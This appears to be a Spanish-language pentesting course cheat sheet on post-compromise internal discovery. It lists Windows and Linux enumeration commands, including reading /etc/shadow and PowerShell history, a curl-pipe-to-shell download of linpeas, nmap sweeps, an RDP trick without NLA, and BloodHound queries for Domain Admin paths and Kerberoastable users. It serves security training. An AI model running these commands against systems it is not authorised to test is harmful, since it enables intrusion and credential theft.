===========================================================
  T2 - 4. DESCUBRIMIENTO INTERNO
===========================================================
Tras comprometer un sistema, preguntarse:
  - Que red?
  - Que usuario? Privilegios?
  - IP/nombre interno conocido o hay que escanear?

===========================================================
  ANALISIS EQUIPO COMPROMETIDO - WINDOWS
===========================================================

--- USUARIO Y PRIVILEGIOS ---
whoami
whoami /priv
whoami /groups
net user [USUARIO] /domain
net localgroup administrators

--- SISTEMA ---
systeminfo
hostname
wmic os get caption,version,osarchitecture

--- RED ---
ipconfig /all
route print
arp -a
netstat -ano
netsh advfirewall show allprofiles

--- DOMINIO Y USUARIOS ---
net config workstation
net view /domain
net group "Domain Admins" /domain
net group "Domain Computers" /domain

--- SOFTWARE INSTALADO ---
wmic product get name,version
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall"

--- COMANDOS RECIENTES ---
doskey /history
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

--- RECURSOS COMPARTIDOS ---
net share
net use

--- AUTOMATICO ---
# WinEnum
# https://raw.githubusercontent.com/neox41/WinEnum/master/WinEnum.bat

# WinPEAS
.\winPEASx64.exe

===========================================================
  ANALISIS EQUIPO COMPROMETIDO - LINUX
===========================================================

--- USUARIO ---
id
sudo -l
groups
cat /etc/passwd
cat /etc/shadow

--- SISTEMA ---
uname -a
hostname
cat /etc/*-release

--- RED ---
ip a
ip r
arp -a
ss -tunlp
netstat -tulnp

--- AUTOMATICO ---
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

===========================================================
  ANALISIS RED INTERNA
===========================================================

--- PUERTOS CLAVE ---
445   : SMB (info y vulns)
3389  : RDP
8080  : JBoss/Tomcat o proxy
88    : Kerberos (DC)
389   : LDAP   (DC)

--- NOMENCLATURA HABITUAL ---
SRVMAD001  : Servidor interno
SRVDC01    : Controlador de dominio
SRVNAS01   : Servidor de almacenamiento

--- BARRIDO RAPIDO ---
nmap -sn [RANGO]                            # ping sweep
nmap -p445,3389,88,389 --open [RANGO]       # puertos clave

===========================================================
  RDP SIN NLA (descubrimiento)
===========================================================
1. Crear archivo .rdp con mstsc
2. Anadir linea:
     enablecredsspsupport:i:0
3. Conectar con el .rdp
   -> permite ver usuarios conectados y dominio interno

===========================================================
  BLOODHOUND
===========================================================

--- INSTALACION KALI ---
sudo apt-get install bloodhound
sudo neo4j start
# Web UI: http://localhost:7474
# Usuario inicial: neo4j / neo4j  (cambiar al primer login)

--- INGESTOR SHARPHOUND (Windows) ---
sharphound.exe -d [DOMINIO] -c All --outputdirectory [RUTA]
# Metodos -c : Default, All, DCOnly, Group, ACL, Session, Trusts, ...

--- INGESTOR SHARPHOUND.PY (Linux) ---
bloodhound-python -u [USER] -p [PASS] -d [DOMINIO] -ns [IP-DC] -c All

--- IMPORTAR DATOS ---
# En BloodHound UI: arrastrar el .zip generado

--- ALTERNATIVA: ADExplorer ---
python3 ADExplorerSnapshot.py [DUMP-AD].dat

===========================================================
  CYPHER QUERIES UTILES
===========================================================
// Camino a Domain Admin desde usuario actual
MATCH p=shortestPath((u:User {name:"[USER@DOMINIO]"})-[*1..]->(g:Group {name:"DOMAIN ADMINS@[DOMINIO]"})) RETURN p

// Maquinas con Unconstrained Delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

// Constrained Delegation
MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p

// Kerberoastable
MATCH (u:User {hasspn:true}) RETURN u
